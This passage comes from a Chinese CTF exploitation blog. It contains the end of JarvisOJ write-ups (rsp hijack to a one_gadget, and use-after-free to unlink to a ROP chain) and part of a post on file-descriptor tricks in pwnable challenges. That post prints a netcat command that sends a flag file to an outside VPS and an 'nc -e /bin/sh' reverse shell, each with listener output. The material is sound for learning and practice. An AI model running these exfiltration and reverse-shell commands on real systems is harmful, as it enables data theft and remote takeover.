<span class="no">template</span> <span class="no">endp</span> </code></pre></td></tr></table> </div> </div><p>根据这段汇编的逻辑，我们每次的输入会被程序反复执行 1000 次，但可以用 ret 跳出这段循环。</p> <p>如果能设置 rsp，使用 ret 就能控制程序的运行流程了。比如把 rsp 改成 rop chain 的开头或者 one_gadget。</p> <p>调试可以发现在 do_test() 运行的过程中，r14， r15 两个寄存器是不变的，因此可以考虑用这两个寄存器保存一些值。以设置 rsp 为 one_gadget 为例，首先我们需要一个 libc 上的地址，并且距离 one_gadget 比较近，调试可以发现在 templete 开头时，<code>rsp + 0x40</code> 这个地方存储了 <code>__libc_start_main + 231</code>，这个地址距离 one_gadget 较近，先把这个地址保存到 r14 上</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">stack</span> <span class="mi">10</span> <span class="err">00:0000│</span> <span class="nf">rsp</span> <span class="mi">0x7ffeb2d93408</span> <span class="err">—▸</span> <span class="mi">0x5641ea376b18</span> <span class="err">◂—</span> <span class="no">rdtsc</span> <span class="err">01:0008│</span> <span class="err">0</span><span class="nf">x7ffeb2d93410</span> <span class="err">—▸</span> <span class="mi">0x7fcc316520e0</span> <span class="p">(</span><span class="no">_dl_fini</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">rbp</span> <span class="err">02:0010│</span> <span class="err">0</span><span class="nf">x7ffeb2d93418</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="na">...</span> <span class="err">↓</span> <span class="err">04:0020│</span> <span class="err">0</span><span class="nf">x7ffeb2d93428</span> <span class="err">—▸</span> <span class="mi">0x5641ea3768c9</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">05:0028│</span> <span class="nf">rbp</span> <span class="mi">0x7ffeb2d93430</span> <span class="err">—▸</span> <span class="mi">0x7ffeb2d93440</span> <span class="err">—▸</span> <span class="mi">0x5641ea376b60</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">06:0030│</span> <span class="err">0</span><span class="nf">x7ffeb2d93438</span> <span class="err">—▸</span> <span class="mi">0x5641ea3768c7</span> <span class="err">◂—</span> <span class="no">jmp</span> <span class="mi">0x5641ea3768c0</span> <span class="err">07:0038│</span> <span class="err">0</span><span class="nf">x7ffeb2d93440</span> <span class="err">—▸</span> <span class="mi">0x5641ea376b60</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">08:0040│</span> <span class="err">0</span><span class="nf">x7ffeb2d93448</span> <span class="err">—▸</span> <span class="mi">0x7fcc312aaa87</span> <span class="p">(</span><span class="no">__libc_start_main</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="no">eax</span> <span class="err">09:0048│</span> <span class="err">0</span><span class="nf">x7ffeb2d93450</span> <span class="err">◂—</span> <span class="mi">0x0</span> </code></pre></td></tr></table> </div> </div><p>通过 0x40 次循环可以把这个地址保存在 r14 上</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="o">&gt;&gt;&gt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">asm</span><span class="p">(</span><span class="s1">&#39;mov r14, rsp;ret&#39;</span><span class="p">))</span> <span class="mi">4</span> <span class="o">&gt;&gt;&gt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">asm</span><span class="p">(</span><span class="s1">&#39;inc r14&#39;</span><span class="p">))</span> <span class="mi">3</span> <span class="o">&gt;&gt;&gt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">asm</span><span class="p">(</span><span class="s1">&#39;mov r14, [r14]; ret&#39;</span><span class="p">))</span> <span class="mi">4</span> </code></pre></td></tr></table> </div> </div><p>然后再根据 libc 中的偏移是固定的，更改 r14 为 one_gadget 地址</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"> <span class="n">execsc</span><span class="p">(</span><span class="n">asm</span><span class="p">(</span><span class="s2">&#34;add r14, {}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">offset</span> <span class="o">/</span> <span class="mh">0x1000</span><span class="p">)))</span> <span class="n">loop</span> <span class="o">=</span> <span class="n">offset</span> <span class="o">-</span> <span class="n">offset</span> <span class="o">/</span> <span class="mh">0x1000</span> <span class="o">*</span> <span class="mh">0x1000</span> <span class="k">print</span> <span class="s2">&#34;loop for {:#x} times...&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">loop</span><span class="p">)</span> <span class="n">pause</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="n">loop</span><span class="p">):</span> <span class="n">execsc</span><span class="p">(</span><span class="n">add_r14</span><span class="p">)</span> </code></pre></td></tr></table> </div> </div><p>最后修改 rsp 即可</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="o">&gt;&gt;&gt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">asm</span><span class="p">(</span><span class="s1">&#39;mov [rsp], r14&#39;</span><span class="p">))</span> <span class="mi">4</span> </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_inst/exp.py">exploit here</a></p> <h2 id="61dctfxworks-500">[61dctf]xworks (500)</h2> <p>静态编译的程序，并且是 strip 后的，先用 rizzo 和 sig 恢复一下符号。</p> <p>程序的逻辑很简单，漏洞也很明显，在 delete， show 和 edit 功能中均存在 uaf</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">show_order</span><span class="p">()</span> <span class="p">{</span> <span class="kt">signed</span> <span class="kt">int</span> <span class="n">idx</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-4h] </span><span class="c1"></span> <span class="n">_libc_write</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Input the order index:&#34;</span><span class="p">,</span> <span class="mi">22LL</span><span class="p">);</span> <span class="n">idx</span> <span class="o">=</span> <span class="n">get_int</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span> <span class="n">idx</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">idx</span> <span class="o">&lt;=</span> <span class="mi">10</span> <span class="p">)</span> <span class="n">_libc_write</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="n">chunk_list</span><span class="p">[</span><span class="n">idx</span><span class="p">],</span> <span class="mi">31LL</span><span class="p">);</span> <span class="c1">// uaf </span><span class="c1"></span> <span class="k">else</span> <span class="n">_libc_write</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Error</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mi">6LL</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">edit_order</span><span class="p">()</span> <span class="p">{</span> <span class="kt">signed</span> <span class="kt">int</span> <span class="n">idx</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-4h] </span><span class="c1"></span> <span class="n">_libc_write</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Input the order index:&#34;</span><span class="p">,</span> <span class="mi">22LL</span><span class="p">);</span> <span class="n">idx</span> <span class="o">=</span> <span class="n">get_int</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span> <span class="n">idx</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">idx</span> <span class="o">&lt;=</span> <span class="mi">10</span> <span class="p">)</span> <span class="n">read</span><span class="p">(</span><span class="mi">0LL</span><span class="p">,</span> <span class="n">chunk_list</span><span class="p">[</span><span class="n">idx</span><span class="p">],</span> <span class="mi">31LL</span><span class="p">);</span> <span class="c1">// uaf </span><span class="c1"></span> <span class="k">else</span> <span class="n">_libc_write</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Error</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mi">6LL</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">delete_order</span><span class="p">()</span> <span class="p">{</span> <span class="kt">signed</span> <span class="kt">int</span> <span class="n">idx</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-4h] </span><span class="c1"></span> <span class="n">_libc_write</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Input the order index:&#34;</span><span class="p">,</span> <span class="mi">22LL</span><span class="p">);</span> <span class="n">idx</span> <span class="o">=</span> <span class="n">get_int</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span> <span class="n">idx</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">idx</span> <span class="o">&lt;=</span> <span class="mi">10</span> <span class="p">)</span> <span class="n">j_free</span><span class="p">(</span><span class="n">chunk_list</span><span class="p">[</span><span class="n">idx</span><span class="p">]);</span> <span class="c1">// uaf </span><span class="c1"></span> <span class="k">else</span> <span class="n">_libc_write</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Error</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mi">6LL</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>题目没有溢出的漏洞，难点在于如何利用这个 uaf。通过 free 两个fastbin 可以 leak 出堆的地址，然后在堆上伪造 chunk 的 meta data 可以造成 unlink，用 unlink 造成任意地址读写后，方法就比较多了。</p> <p>我的方法是通过多次任意地址写在一个固定地址（如 elf.bss() + 0x500) 上写 rop chain，然后再次通过任意地址写改写 rbp 和 ret addr，通过 stack-pivot 来跳转到 rop chain。</p> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_xwork/exp.py">exploit here</a></p> <h1 id="广告时间">广告时间</h1> <h2 id="广告一">广告一</h2> <p>目前和几位朋友（来自各大战队）一起做的 <a href="https://ctf-wiki.github.io/ctf-wiki/">ctf-wiki</a></p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fve2xfo1j6j31020igjur.jpg" alt=""></p> <p>包括 CTF 中各个分类的基础知识及相关例题，也处于持续更新的过程中。</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fve33tp777j305508j3ym.jpg" alt=""></p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fve3498t1kj304v08u74e.jpg" alt=""></p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fve3498t1kj304v08u74e.jpg" alt=""></p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fve351ks2gj305r0570st.jpg" alt=""></p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fve351ks2gj305r0570st.jpg" alt=""></p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fve35nfizyj306d040jrb.jpg" alt=""></p> <p>欢迎各位大佬加入（尤其是 web 前端大佬）</p> <h2 id="广告二">广告二</h2> <p><a href="http://m4x.fun">My Blog</a></p> <p><a href="https://github.com/bash-c">My Github</a></p> <p>欢迎师傅们一起交流 :)</p> <h1 id="reference-and-thanks-to">Reference and Thanks to</h1> <p><a href="https://www.jarviswang.me">https://www.jarviswang.me</a></p> <p>Linux Manual Page</p> <p><a href="http://docs.pwntools.com/en/stable/index.html">http://docs.pwntools.com/en/stable/index.html</a></p> <p><a href="https://github.com/Naetw/CTF-pwn-tips">https://github.com/Naetw/CTF-pwn-tips</a></p> <p><a href="https://veritas501.space/2017/03/10/JarvisOJ_WP/">https://veritas501.space/2017/03/10/JarvisOJ_WP/</a></p> <p><a href="http://blog.csdn.net/charlie_heng">http://blog.csdn.net/charlie_heng</a></p> <p><a href="https://www.jianshu.com/p/40f846d14450">https://www.jianshu.com/p/40f846d14450</a></p> <p><a href="https://www.jianshu.com/p/3d3a37c3e1c7">https://www.jianshu.com/p/3d3a37c3e1c7</a></p> <p><a href="http://muhe.live/2016/12/24/what-DynELF-does-basically/">http://muhe.live/2016/12/24/what-DynELF-does-basically/</a></p> <p><a href="https://pastebin.com/eqzdtwmw">https://pastebin.com/eqzdtwmw</a></p> <p><a href="https://gloxec.github.io/2017/05/16/Reverse%20Engineer%20a%20stripped%20binary/">https://gloxec.github.io/2017/05/16/Reverse%20Engineer%20a%20stripped%20binary/</a></p> <p><a href="http://www.freebuf.com/articles/terminal/134980.html">http://www.freebuf.com/articles/terminal/134980.html</a></p> https://bash-c.github.io/post/play-with-file-descriptor-3/ Wed, 12 Sep 2018 15:30:01 +0800 https://bash-c.github.io/post/play-with-file-descriptor-3/ <p>接下来以一些 pwnable 题目为例分析一些 fd tricks，如果以后遇到新的操作会继续更新。 同样感谢大佬们的无私分享。</p> <h2 id="level-0-pwnablekr---fd">level 0: pwnable.kr - fd</h2> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">fd</span><span class="err">@</span><span class="nl">ubuntu</span><span class="p">:</span><span class="o">~</span><span class="err">$</span> <span class="n">cat</span> <span class="n">fd</span><span class="p">.</span><span class="n">c</span> <span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"> </span><span class="cp"></span><span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[],</span> <span class="kt">char</span><span class="o">*</span> <span class="n">envp</span><span class="p">[]){</span> <span class="k">if</span><span class="p">(</span><span class="n">argc</span><span class="o">&lt;</span><span class="mi">2</span><span class="p">){</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;pass argv[1] a number</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">atoi</span><span class="p">(</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="p">)</span> <span class="o">-</span> <span class="mh">0x1234</span><span class="p">;</span> <span class="kt">int</span> <span class="n">len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">len</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="s">&#34;LETMEWIN</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">buf</span><span class="p">)){</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;good job :)</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="n">system</span><span class="p">(</span><span class="s">&#34;/bin/cat flag&#34;</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;learn about Linux file IO</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>有了前两篇的基础，这个就很简单了，只需要控制 read 的 第一个参数是 0 即可，当 fd = 0时，read 将会从 0 号文件，此时即为从 stdin 读取输入，接下来输入 &ldquo;LETMEWIN\n&rdquo; 即可。</p> <h2 id="level-1-wdb2018_impossible">level 1: WDB2018_impossible</h2> <p><a href="https://github.com/0x01f/pwn_repo/tree/master/WDB2018_impossible">binary &amp; exp here</a></p> <p>我们只分析与 fd 有关的部分</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="n">memset</span><span class="p">(</span><span class="n">secret_random</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">);</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/urandom&#34;</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">secret_random</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Input your secret code:&#34;</span><span class="p">,</span> <span class="n">secret_random</span><span class="p">);</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">memcmp</span><span class="p">(</span><span class="n">secret_random</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">)</span> <span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Amazing! How can u know the secret code?&#34;</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Ok,u are the boss, u can do anything u want&#34;</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;But u should be quiet about this, because this is illegal&#34;</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;So...Close ur mouth...&#34;</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="n">qmemcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">bored_buf</span><span class="p">,</span> <span class="mh">0x1000uLL</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>仔细看这段代码，open(&quot;/dev/urandom&rdquo;, 0); 后并没有对应的 close 操作。 因此如果重复运行这段代码，fd 会一直增加，到达该用户所能承受的最大量后（可以使用 <code>ulimit -a</code> 查看），下一次 open(&quot;/dev/urandom&rdquo;, 0); 就会失败，导致 read(fd, secret_random, 8uLL); 读了空数据，我们只需要输入 <code>\0</code> 即可通过 memcmp 的验证；</p> <p>还有一点需要注意，这道题目随后关闭了 stdin (close(0))，因此即使我们能 get shell，我们的输入也不会被接受。但幸运的是题目只关闭了 stdin，stdout 和 stderr 还是可以用的，因此思路就有很多了，比如直接构造一段 <code>open(&quot;./flag&quot;, 0); read(0, addr, 0x100); puts(addr)</code> 的 ropchain 就可以得到 flag （因为 close(0)， open(&quot;./flag&rdquo;, 0) 返回的 fd 将为 0)。</p> <p>类似的题目还有 pwnable.kr - otp</p> <h2 id="level-2-whitehat2018---pwn3">level 2: Whitehat2018 - pwn3</h2> <p><a href="https://github.com/0x01f/pwn_repo/tree/master/WhiteHat2018_pwn03">binary &amp; exp here</a></p> <p>同样只分析与 fd 有关的部分，通过 ret2vsyscall 获得一次任意命令执行的机会后，剩下的目的就是如何获取 flag 了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">echo</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">v0</span><span class="p">;</span> <span class="c1">// ST0C_4 </span><span class="c1"></span> <span class="kt">int</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-E4h] </span><span class="c1"></span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">216</span><span class="p">];</span> <span class="c1">// [rsp+10h] [rbp-E0h] </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+E8h] [rbp-8h] </span><span class="c1"></span> <span class="n">v3</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> <span class="n">v0</span> <span class="o">=</span> <span class="n">v1</span> <span class="o">+</span> <span class="mi">32</span><span class="p">;</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">v0</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Echo machine: &#34;</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span> <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">v0</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">deleteyourevilstring</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>这道题目的 stdin 和 stdout 都被关闭了，但因为我们有一次任意命令执行的机会，至少有以下三种方法获得 flag:</p> <ul> <li>利用 stderr， 执行 <code>sh ./flag</code> 。当 shell 检测到 flag 的内容不是合法的 shell 指令时，会通过 stderr 将 flag 内容打印到显示屏上</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">WhiteHat2018_pwn03 <span class="o">[</span>master●<span class="o">]</span> sh ./flag ./flag: 1: ./flag: flag<span class="o">{</span>this_is_flag<span class="o">}</span>: not found </code></pre></td></tr></table> </div> </div><ul> <li>利用 pipe，前两篇提到 pipe 也是一种文件，虽然 stdin 和 stdout 被关闭了，但我们任然可以通过执行命令建立 pipe，利用 pipe 将 flag 内容发送到公网 vps，在 vps 上监听即可</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">WhiteHat2018_pwn03 <span class="o">[</span>master●<span class="o">]</span> cat ./flag<span class="p">|</span> nc your_ip your_port ...... On vps: ubuntu@VM-61-71-ubuntu:~$ nc -lvp your_port Listening on <span class="o">[</span>0.0.0.0<span class="o">]</span> <span class="o">(</span>family 0, port ????<span class="o">)</span> Connection from <span class="o">[</span>1.202.222.147<span class="o">]</span> port ???? <span class="o">[</span>tcp/*<span class="o">]</span> accepted <span class="o">(</span>family 2, sport 47042<span class="o">)</span> flag<span class="o">{</span>this_is_flag<span class="o">}</span> </code></pre></td></tr></table> </div> </div><ul> <li>建立一个 reverse shell，reverse shell 的原理完全可以另开一篇 post 介绍，本篇只会在最后简单介绍其原理，更详细的可以看 reference。</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">WhiteHat2018_pwn03 <span class="o">[</span>master●<span class="o">]</span> nc -e /bin/sh your_ip your_port ...... On vps: ubuntu@VM-61-71-ubuntu:~$ nc -lvp your_port Listening on <span class="o">[</span>0.0.0.0<span class="o">]</span> <span class="o">(</span>family 0, port ????<span class="o">)</span> Connection from <span class="o">[</span>1.202.222.147<span class="o">]</span> port ???? <span class="o">[</span>tcp/*<span class="o">]</span> accepted <span class="o">(</span>family 2, sport 47442<span class="o">)</span> ls flag libc-2.27.i64 libc-2.27.so onehit onehit.i64 solve.py <span class="nb">pwd</span> /home/m4x/pwn_repo/WhiteHat2018_pwn03 id <span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>m4x<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>m4x<span class="o">)</span> <span class="nv">组</span><span class="o">=</span>1000<span class="o">(</span>m4x<span class="o">)</span>,7<span class="o">(</span>lp<span class="o">)</span>,27<span class="o">(</span>sudo<span class="o">)</span>,100<span class="o">(</span>users<span class="o">)</span>,109<span class="o">(</span>netdev<span class="o">)</span>,113<span class="o">(</span>lpadmin<span class="o">)</span>,117<span class="o">(</span>scanner<span class="o">)</span>,124<span class="o">(</span>sambashare<span class="o">)</span>,127<span class="o">(</span>docker<span class="o">)</span> </code></pre></td></tr></table> </div> </div><p>类似的题目有 0CTF2018 的 babystack</p> <h2 id="level-3-tokyowestern2018---load">level 3: TokyoWestern2018 - load</h2> <p><a href="https://github.com/0x01f/pwn_repo/tree/master/TokyoWesterns2018_load">bianry &amp; exp here</a></p> <p>这道题目用到了很多 fd 的知识</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span 